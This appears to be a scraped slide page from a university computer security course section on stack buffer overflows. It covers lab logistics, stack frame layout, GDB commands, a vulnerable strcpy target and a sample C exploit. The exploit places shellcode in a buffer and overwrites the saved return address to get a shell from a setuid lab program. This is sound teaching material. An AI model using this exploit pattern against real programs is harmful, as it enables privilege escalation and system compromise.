computer security sec4on week 2 buffer overflows
play

Computer Security Sec4on Week 2: Buffer Overflows - PowerPoint PPT Presentation

May 12, 2023 •352 likes •502 views

CSE 484 / CSE M 584 Computer Security Sec4on Week 2: Buffer Overflows TA: Thomas Crosley tcrosley@cs Thanks to Franzi Roesner, Adrian

  1. CSE ¡484 ¡/ ¡CSE ¡M ¡584 ¡ ¡ Computer ¡Security ¡ Sec4on ¡Week ¡2: ¡ Buffer ¡Overflows ¡ ¡ TA: ¡Thomas ¡Crosley ¡ tcrosley@cs ¡ ¡ Thanks ¡to ¡Franzi ¡Roesner, ¡Adrian ¡Sham, ¡and ¡other ¡ contributors ¡from ¡previous ¡quarters ¡

  2. General ¡Lab ¡1 ¡Guidance ¡ • You ¡ should ¡work ¡in ¡groups ¡of ¡3. ¡ ¡ • Group ¡forma4on ¡area ¡in ¡forum ¡ • Make ¡sure ¡you ¡have ¡finalized ¡your ¡group ¡ when ¡you ¡send ¡us ¡your ¡public ¡key! ¡ ¡ • Talk ¡to ¡us ¡if ¡you ¡have ¡trouble ¡connec4ng ¡to ¡ the ¡server. ¡ • The ¡referenced ¡readings ¡really ¡help ¡ – Smashing ¡the ¡Stack ¡for ¡Fun ¡and ¡Profit ¡ – Format ¡String ¡Vulnerabili4es ¡

  3. General ¡Lab ¡1 ¡Guidance ¡ • 7 ¡targets ¡located ¡in ¡ /bin/ ¡ – Do ¡not ¡recompile ¡these! ¡ – Installed ¡as ¡setuid ¡hax0red[i] ¡ • 7 ¡stub ¡sploit ¡files ¡located ¡in ¡ ~/sploits/ ¡ – Make ¡sure ¡your ¡final ¡sploits ¡are ¡built ¡here! ¡ – As ¡with ¡all ¡data, ¡consider ¡backing ¡up ¡elsewhere ¡ J ¡ • Source ¡code ¡for ¡targets ¡in ¡ ~/sources ¡ • Make ¡sure ¡each ¡sploit ¡references ¡the ¡correct ¡ target! ¡ • Sploit ¡8 ¡is ¡extra ¡credit ¡

  4. General ¡Lab ¡1 ¡Guidance ¡ • We ¡provide ¡the ¡shellcode. ¡ ¡ – You ¡don’t ¡need ¡to ¡do ¡this ¡part. ¡Just ¡write ¡it ¡into ¡ buffer. ¡ • You ¡need ¡to ¡hard-­‑code ¡addresses ¡into ¡your ¡ solu4ons. ¡(Don’t ¡use ¡get_sp().) ¡ • NOP ¡sleds ¡are ¡needed ¡when ¡you ¡don’t ¡know ¡ exact ¡address ¡of ¡your ¡buffer. ¡You’ll ¡know ¡the ¡ exact ¡address ¡in ¡this ¡lab. ¡ • Copying ¡will ¡stop ¡at ¡a ¡null ¡byte ¡(00) ¡in ¡the ¡buffer. ¡

  5. Quick ¡4p ¡on ¡ssh ¡keys ¡ • Mac/Linux ¡ – ssh-keygen -t rsa -f mykey • Give ¡ us ¡ the ¡mykey.pub ¡file ¡ ¡ • You ¡keep ¡mykey ¡ – ssh -i mykey username@server • Windows ¡ – Use ¡pujygen ¡

  6. General ¡Lab ¡1 ¡Guidance ¡ • Goal: ¡Cause ¡targets ¡(which ¡run ¡as ¡a ¡special ¡ user) ¡to ¡execute ¡shellcode ¡to ¡get ¡a ¡different ¡ user’s ¡shell. ¡ • Approach: ¡set-­‑up ¡arguments ¡to ¡vulnerable ¡ program ¡and ¡then ¡call ¡vulnerable ¡program ¡ • Confirma8on: ¡running ¡“whoami” ¡should ¡show ¡ “hax0red[i]” ¡

  7. Lab ¡1 ¡Deadlines ¡ START ¡EARLY! ¡ ¡ Some ¡of ¡the ¡exploits ¡are ¡complex. ¡ ¡ Checkpoint ¡deadline ¡(Sploits ¡1-­‑3): ¡ April ¡18 th , ¡8pm ¡ Final ¡deadline ¡(Sploits ¡4-­‑7): ¡ April ¡29 th , ¡8pm ¡

  8. Memory ¡layout ¡ hjps://courses.cs.washington.edu/courses/cse333/15su/lectures/lec02.pdf ¡

  9. Stack ¡Frame ¡Structure ¡ Lower ¡Addresses ¡ ¡ � ¡4 ¡bytes ¡(1 ¡word) ¡ � ¡ Stack ¡Pointer ¡(ESP) ¡ Local ¡Variables ¡ Code ¡executes ¡ (and ¡buffer ¡is ¡ Frame ¡Pointer ¡(EBP) ¡ Saved ¡Frame ¡Pointer ¡ wri5en) ¡this ¡way ¡ Saved ¡EIP ¡(Return ¡Address) ¡ Func4on ¡Arguments ¡ Local ¡Variables ¡ Stack ¡grows ¡ this ¡way ¡ Saved ¡Frame ¡Pointer ¡ Stack ¡Frame ¡ Saved ¡EIP ¡(Return ¡Address) ¡ Func4on ¡Arguments ¡ Higher ¡Addresses ¡ ¡

  10. GDB ¡is ¡your ¡friend ¡ • To ¡execute ¡sploitX ¡and ¡use ¡symbols ¡of ¡targetX: ¡ cgdb -e sploitX -s /bin/targetX –d ~/sources • Then, ¡to ¡set ¡breakpoint ¡in ¡targetX’s ¡main(): ¡ ¡ ¡ catch exec Break ¡when ¡exec’d ¡into ¡a ¡new ¡process ¡ run Start ¡program ¡ break main When ¡breaks: ¡Set ¡desired ¡breakpoint ¡ continue Con4nue ¡running ¡(will ¡break ¡at ¡main()) ¡

  11. Other ¡Useful ¡GDB ¡Commands ¡ • step ¡: ¡execute ¡next ¡source ¡code ¡line ¡ • next ¡: ¡step ¡over ¡func4on ¡ • stepi ¡: ¡execute ¡next ¡assembly ¡instruc4on ¡ • list ¡: ¡display ¡source ¡code ¡ • disassemble ¡: ¡disassemble ¡specified ¡func4on ¡ • x ¡: ¡inspect ¡memory ¡ – e.g., ¡20 ¡words ¡at ¡address: ¡ x/20wx 0xbffffcd4 • info register ¡: ¡inspect ¡current ¡register ¡values ¡ • info frame ¡: ¡info ¡about ¡current ¡stack ¡frame ¡ • p ¡: ¡inspect ¡variable ¡ – e.g., ¡ p &buf or ¡ ¡ p buf • ctrl-x + ctrl-a: Toggle ¡split ¡screen ¡for ¡gdb ¡

  12. Target0 ¡ int foo(char *argv[]) What’s ¡the ¡problem? ¡ { char buf[200]; strcpy(buf, argv[1]); No ¡bounds ¡checking ¡ ¡ } on ¡strcpy(). ¡ int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "target1: argc != 2\n"); exit(EXIT_FAILURE); } foo(argv); return 0; }

  13. Sploit0 ¡ • Construct ¡buffer ¡that: ¡ – Contains ¡shellcode. ¡ – Exceeds ¡expected ¡size ¡(200). ¡ – Overwrites ¡return ¡address ¡on ¡stack ¡with ¡address ¡ of ¡shellcode. ¡ • Draw ¡a ¡stack ¡frame ¡ • Demo: ¡Figuring ¡out ¡what ¡address ¡to ¡write ¡ where. ¡

  14. Sploit0 ¡ int main(void) { char *args[3]; char *env[1]; char buf[256]; memset(buf, 0x90, sizeof(buf) - 1); // NOPs to make sure no null bytes buf[255] = 0; // make sure copying stops when you expect memcpy(buf, shellcode, sizeof(shellcode) - 1); // at beginning of buffer // overwrite return address (at buf+196) // with address of shellcode (start of buffer) *(unsigned int *)(buf + 204) = 0xffffdeeb ; args[0] = TARGET; args[1] = buf; args[2] = NULL; env[0] = NULL; if (0 > execve(TARGET, args, env)) perror("execve failed"); return 0; }

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Lab 2: Buffer Overflows Fengwei Zhang SUSTech CS 315 Computer Security 1 Buffer Overflows

Lab 2: Buffer Overflows Fengwei Zhang SUSTech CS 315 Computer Security 1 Buffer Overflows

Lab 2: Buffer Overflows Fengwei Zhang SUSTech CS 315 Computer Security 1 Buffer Overflows One of the most common vulnerabilities in software Programming languages commonly associated with buffer overflows including C and C++

1.14k views • 17 slides
Introduction Buffer Overflows Buffer overflows were the most common form of security

Introduction Buffer Overflows Buffer overflows were the most common form of security

Introduction Buffer Overflows Buffer overflows were the most common form of security vulnerability in the 90s. Buffer overflows dominate in the area of remote network penetration vulnerabilities. CS 465 They represent one of the

651 views • 4 slides
Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a

Buffer Overflows and Defenses CS 419: Computer Security Lecture 10 and 11 Buffer Overflow a very common attack mechanism from 1988 Morris Worm to Code Red, Slammer, Sasser and many others prevention techniques known still of major concern

873 views • 53 slides
CSE 484 / CSE M 584 Computer Security: Buffer Overflows

CSE 484 / CSE M 584 Computer Security: Buffer Overflows

CSE 484 / CSE M 584 Computer Security: Buffer Overflows II TA: Viktor Farkas vfarkas@cs Original slides by Franzi Lab 1 Deadline Reminders Lab

373 views • 11 slides
CSE 484 / CSE M 584 Computer Security Sec4on Week 4: Cryptography TA: Thomas Crosley

CSE 484 / CSE M 584 Computer Security Sec4on Week 4: Cryptography TA: Thomas Crosley

CSE 484 / CSE M 584 Computer Security Sec4on Week 4: Cryptography TA: Thomas Crosley tcrosley@cs Thanks to Franzi Roesner and Adrian Sham for previous slides [Examples/Images thanks to Wikipedia.] Administrivia Lab 1 Final due next week

495 views • 30 slides
ECE590 Computer and Information Security Fall 2018 Buffer Overflows and Software Security Tyler

ECE590 Computer and Information Security Fall 2018 Buffer Overflows and Software Security Tyler

ECE590 Computer and Information Security Fall 2018 Buffer Overflows and Software Security Tyler Bletsch Duke University What is a Buffer Overflow? Intent Arbitrary code execution Spawn a remote shell or infect with worm/virus

1.26k views • 76 slides
Computer and Information Security Fall 2020 Buffer Overflows and Software Security Tyler Bletsch

Computer and Information Security Fall 2020 Buffer Overflows and Software Security Tyler Bletsch

ECE560 Computer and Information Security Fall 2020 Buffer Overflows and Software Security Tyler Bletsch Duke University What is a Buffer Overflow? Intent Arbitrary code execution Spawn a remote shell or infect with worm/virus

983 views • 75 slides
Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer

Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer

Security: Buffer Overflows and Defenses CS 416: Operating Systems Design Department of Computer Science Rutgers University http://www.cs.rutgers.edu/~vinodg/416 Buffer Overflow a very common attack mechanism from 1988 Morris Worm to Code Red,

950 views • 55 slides
Lab 2: Buffer Overflows Fengwei Zhang Wayne State University Course: Cyber Security Prac@ce 1

Lab 2: Buffer Overflows Fengwei Zhang Wayne State University Course: Cyber Security Prac@ce 1

Lab 2: Buffer Overflows Fengwei Zhang Wayne State University Course: Cyber Security Prac@ce 1 Buffer Overflows One of the most common vulnerabili@es in soEware Programming languages commonly associated with buffer overflows including

199 views • 17 slides
Computer Security Buffer Overflows Denial of Service MIE456 Joseph Kong Overview Program

Computer Security Buffer Overflows Denial of Service MIE456 Joseph Kong Overview Program

Computer Security Buffer Overflows Denial of Service MIE456 Joseph Kong Overview Program Exploitation Buffer Overflows Memory Declaration Smashing The Stack TCP/IP Three Way Handshake Denial of Service SYN Flooding

403 views • 13 slides
Lab 2: Buffer Overflows Fengwei Zhang Wayne State University CSC 5991 Cyber Security PracCce 1

Lab 2: Buffer Overflows Fengwei Zhang Wayne State University CSC 5991 Cyber Security PracCce 1

Lab 2: Buffer Overflows Fengwei Zhang Wayne State University CSC 5991 Cyber Security PracCce 1 Buffer Overflows One of the most common vulnerabiliCes in soGware Programming languages commonly associated with buffer overflows including

195 views • 17 slides
Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow

Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow

Last time We continued By launching our 1st section: Buffer Software Security overflows and other memory safety vulnerabilities Buffer overflow fundamentals This time We will finish up By looking at Buffer Overflow overflows

1.33k views • 103 slides
Software In-Security Buffer overflows Overview Web Application security Malware OS

Software In-Security Buffer overflows Overview Web Application security Malware OS

Lecture overview Table of contents: Introduction to SW security Software In-Security Buffer overflows Overview Web Application security Malware OS security topics Code scanning Emmanuel Benoist Taught by Ulrich

479 views • 13 slides
ASLR & DEP DAVID HEAVERN Problem Statement Security Issues Buffer Overflows

ASLR & DEP DAVID HEAVERN Problem Statement Security Issues Buffer Overflows

ASLR & DEP DAVID HEAVERN Problem Statement Security Issues Buffer Overflows Buffer overflows are the source of many of the common vulnerabilities in modern software Caused by not checking the source length when writing to a

1.88k views • 130 slides
Buffer overflows & friends CS642: Computer Security

Buffer overflows & friends CS642: Computer Security

Buffer overflows & friends CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu University of

530 views • 35 slides
Buffer overflows & friends CS642: Computer Security

Buffer overflows & friends CS642: Computer Security

Buffer overflows & friends CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu University of

640 views • 34 slides
1 Questions? q Is the Internets architecture fundamentally broken that we need to clean

1 Questions? q Is the Internets architecture fundamentally broken that we need to clean

Resolving the Transport Tussle Recursive InterNetwork Architecture @ Computer Science Boston U. http://csr.bu.edu/rina 1 What this is (NOT) about q NOT much about specific protocols, algorithms, interfaces, implementation q

524 views • 15 slides
Lecture 05 Control Flow III Stephen Checkoway CS 343 Fall 2020 Based on Michael

Lecture 05 Control Flow III Stephen Checkoway CS 343 Fall 2020 Based on Michael

Lecture 05 Control Flow III Stephen Checkoway CS 343 Fall 2020 Based on Michael Baileys ECE 422 example.c void foo(int a, int b) { char buf1[16]; } int main() { foo(3,6); } example.s (x86) main: pushl %ebp movl %esp, %ebp

828 views • 63 slides
Memory Management Marco Serafini COMPSCI 532 Lecture 12 Announcements Project 2 published

Memory Management Marco Serafini COMPSCI 532 Lecture 12 Announcements Project 2 published

Memory Management Marco Serafini COMPSCI 532 Lecture 12 Announcements Project 2 published Info on website GitHub repo on Piazza Deadline: November 7 Next class: hands-on session Threads, processes, sockets,

663 views • 42 slides
CS5460: Operating Systems Lecture 13: Memory Management (Chapter 8) CS 5460: Operating Systems

CS5460: Operating Systems Lecture 13: Memory Management (Chapter 8) CS 5460: Operating Systems

CS5460: Operating Systems Lecture 13: Memory Management (Chapter 8) CS 5460: Operating Systems Where are we? Basic OS structure, HW/SW interface, interrupts, scheduling Concurrency Memory management Storage

305 views • 17 slides
Program address space What does the OS loader do? 0x7ffffffff0000 Stack 8MB reserved Creates

Program address space What does the OS loader do? 0x7ffffffff0000 Stack 8MB reserved Creates

Program address space What does the OS loader do? 0x7ffffffff0000 Stack 8MB reserved Creates new process Sets up address space/segments Read executable file, load instructions, init global data 0x7ffff770000 Shared library

844 views • 16 slides
POLYHEDRAL CLINCHING AUCTIONS BEYOND HARD BUDGET CONSTRAINTS Gagan Goel Vahab Mirrokni Renato

POLYHEDRAL CLINCHING AUCTIONS BEYOND HARD BUDGET CONSTRAINTS Gagan Goel Vahab Mirrokni Renato

POLYHEDRAL CLINCHING AUCTIONS BEYOND HARD BUDGET CONSTRAINTS Gagan Goel Vahab Mirrokni Renato Paes Leme Google Research NYC Item values are an useful abstraction but often intangible. Typically, buyers care about the items

551 views • 33 slides
Ideas Towards Using Discrete Mul5agent Pathfinding to Address

Ideas Towards Using Discrete Mul5agent Pathfinding to Address

Workshop on Mul,agent Pathfinding Ideas Towards Using Discrete Mul5agent Pathfinding to Address Con5nuous Problems Athanasios Kron,ris 1 , Qandeel Sajid 2 , Kostas

579 views • 23 slides
System Bootstrap 1 System Bootstrap or Bootup Bringing OS into memory and having the

System Bootstrap 1 System Bootstrap or Bootup Bringing OS into memory and having the

The following slides describe how an x86-processor based computer running Linux boots up This is part of your reading assignment Adapted from Understanding the Linux Kernel by Bovet and Cesati I recommend this book to

413 views • 4 slides

More recommend